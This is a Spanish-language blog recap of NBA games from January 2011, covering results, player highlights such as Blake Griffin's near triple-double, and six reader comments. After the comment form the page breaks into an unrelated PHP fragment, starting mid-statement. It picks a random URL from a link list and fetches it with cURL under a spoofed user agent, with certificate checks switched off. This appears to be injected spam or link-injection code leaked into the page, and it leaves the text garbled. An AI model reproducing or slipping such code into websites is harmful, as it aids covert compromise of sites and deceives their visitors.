La crónica (22/01/2011)

23 de January de 2011 por TheDeerHunter

No es frecuente ver perder este curso a Spurs y Celtics. Concretamente no llega a un 16% de las ocasiones en un caso y a un 24% en el otro. Anoche se pusieron de acuerdo y perdieron. Los Spurs se vieron sorprendidos por la defensa de los Hornets a pesar de la muestra de poder contra Atlanta y se quedaron en 72 puntos. Los Celtics tropezaron en Washington. Wall les regaló un último balón para ganar pero asistimos a la vertiente humana de Pierce fallando su lanzamiento más típico. Erden no lo hizo mal, aunque según dijo Rivers la lesión de Shaq no reviste demasiada gravedad.

Los perseguidores del Este aprovecharon todos la circunstancia. Los Hawks se desquitaron del varapalo de ayer con un partidazo frente a los Bobcats. Joe Johnson estuvo sensacional y Bibby sacó su orgullo a pasear. Orlando también lo hicieron francamente bien en Houston en otra gran actuación coral para disfrute de Van Gundy. Los Bulls tuvieron el caramelo de jugar en Cleveland y los Heat, además de lo lógico en LeBron disfrutaron del inmenso partido de Mike Miller para romper su mala racha en Toronto, a pesar de Calderon y Bargnani.

Nada menos que 6 derrotas seguidas llevan los Knicks. Anoche lo tuvieron muy bien para romper la racha en Oklahoma, pero apareció el Durant más letal para dejarles con tres palmos de narices en los últimos instantes. El triple ganador de Durantula sólo está al alcance de los más grandes. Los Mavs también tiraron del talento de Nowitzki para remontar en New Jersey. En este caso hubo una gran dosis de buena suerte para que ese balón entrara. Y para canastones decisivos la de Griffin y no de cualquier manera. Triplazo con el choque empatado contra los Warriors a falta de medio minuto. Antes de eso nos había obsequiado con un par de animaladas de las suyas y una actuación de la que ya hablaremos después… en la sección del MVP.

La cola del Oeste se pone al rojo vivo con dos Españoles por medio. Rudy estuvo descomunal en el último cuarto de la importantísima victoria que lograron contra Indiana. Marc hizo el mejor partido del año en Milwaukee, amarrando la victoria. Los Suns empiezan a hacer la goma y anoche tiraron a la basura un partido feísimo en Detroit, cuando lo tenían prácticamente ganado.

Para terminar Utah cosechó su 4ª derrota consecutiva en Philadelphia. Sloan ya no sabe que hacer para hacerles reaccionar. Es curioso que este bache tan negativo lo están sufriendo prácticamente todos en la conferencia.

MVP: Anoche hubo grandes actuaciones individuales de ilustres en esta liga. Sin embargo hoy no vamos ni a mencionarlas al lado de lo que volvió a darnos Griffin. Casi un triple doble monumental con 30 puntos, 18 rebotes y 8 asistencias; highlights de todos los colores, olores y sabores; por si faltaba poco un triple decisivo en los instantes en los que a los humanos les tiembla el pulso. Es otra dimensión.

El rookie: Dejando de lado a la Bestia, John Wall no estuvo mal en la victoria ante los Celtics. Eso sí, se dejó robar un balón por Rondo al final de su último ataque que era para asesinarlo.

La sorpresa: Mike Miller, la caballería en Miami. 32 puntos, 10 rebotes, 3 asistencias en ausencia de Wade y Bosh.

La decepción: Lo que decía Denise que buscaba anoche Parker en el suelo era su cintura, que se la había hecho trizas CP3, y no fue ni de lejos el peor parado del equipo. Menuda master class defensiva que recibió anoche Popovic… a su edad.

El mayor esfuerzo en vano: Otro jugó por antonomasia. Curry 32 puntos, 6 rebotes 8 asitencias mientras observa como sus posibilidades de postemporada son cada vez más remotas.

Comenta

6 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Vaya escándalo lo de Griffin, ando buscando algun video en youtube de lo de anoche pero no lo veo.

    Y los Warriors a pesar de las buenas temporadas individuales de casi todos sus jugadores importantes son una autentica banda como equipo, muy posiblemente el equipo que peor defiende de toda la liga, y en ataque estático también son muy flojos.

      Citar

  2. HeiNeKeN dice:
    #2

      Citar

  3. Busky23 dice:
    #3

    A falta de Wade,Miller había de ser protagonista y vaya si lo fue,sacando a pasear su fusil.
    Este año varios equipos que han encadenado varias victorias luego se ha transformado en varias derrotas (Hornets,Orlando,Lakers,Dallas,y ahora les toca el turno a los Knicks y a los Jazz).
    Acabo de ver los hightlights de Griffin…tremendo este muchacho,tremendo,ya estoy deseando ver el Slam Dunk,fijo que nos sorprende.
    El Triplaco de Durant es sensacional,solo para elegidos.
    Menudos ninjas estos Hornets,y menudos pinchos de merluza de Okafor!!!!

      Citar

  4. Sancho88 dice:
    #4

    Dirk, perdona que discrepe de tu última frase, pero ese privilegio está sólo al alcance de los Sacramento Kings, que además, acaparan ese dudoso honor desde que se fue Rick Adelman, y ya han pasado más de 5 años de aquello. Y los Hornets imparables, maxada tremenda ganarle a estos spurs, y ahora acumulan un record de 9 victorias consecutivas. Pa mear y no exar gota.
    Quien duda ahora de la calidad de Paul?

    Y a la pregunta sobre qué puede hacer Sloan para que la situacion de su equipo mejore… a mi se me ocurre una respuesta: marcharse. A veces me sonroja que lleve tantos años en el banquillo mormón como llevo yo vivo. Tiene que tener el culo carpeta ya.

      Citar

  5. Rompe dice:
    #5

    Ojo que Griffin lleva un 60% en triples! xD

      Citar

  6. Denise dice:
    #6

    Yo a Sloan lo respeto. Que un tío consiga llevar 20 y tantos años entrenando al mismo equipo tiene mucho merito, y casi siempre metiendolo en playoffs sin tener a veces muy buenas plantillas. De no ser por un tal Jordan y Cia tendría algunos anillos. Si no recuerdo mal, creo que no tiene ningún premio a “Entrenador del Año”, y creo que por trayectoria lo merecería, al menos más que tipos como San Mitchell o Avery Johnson…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>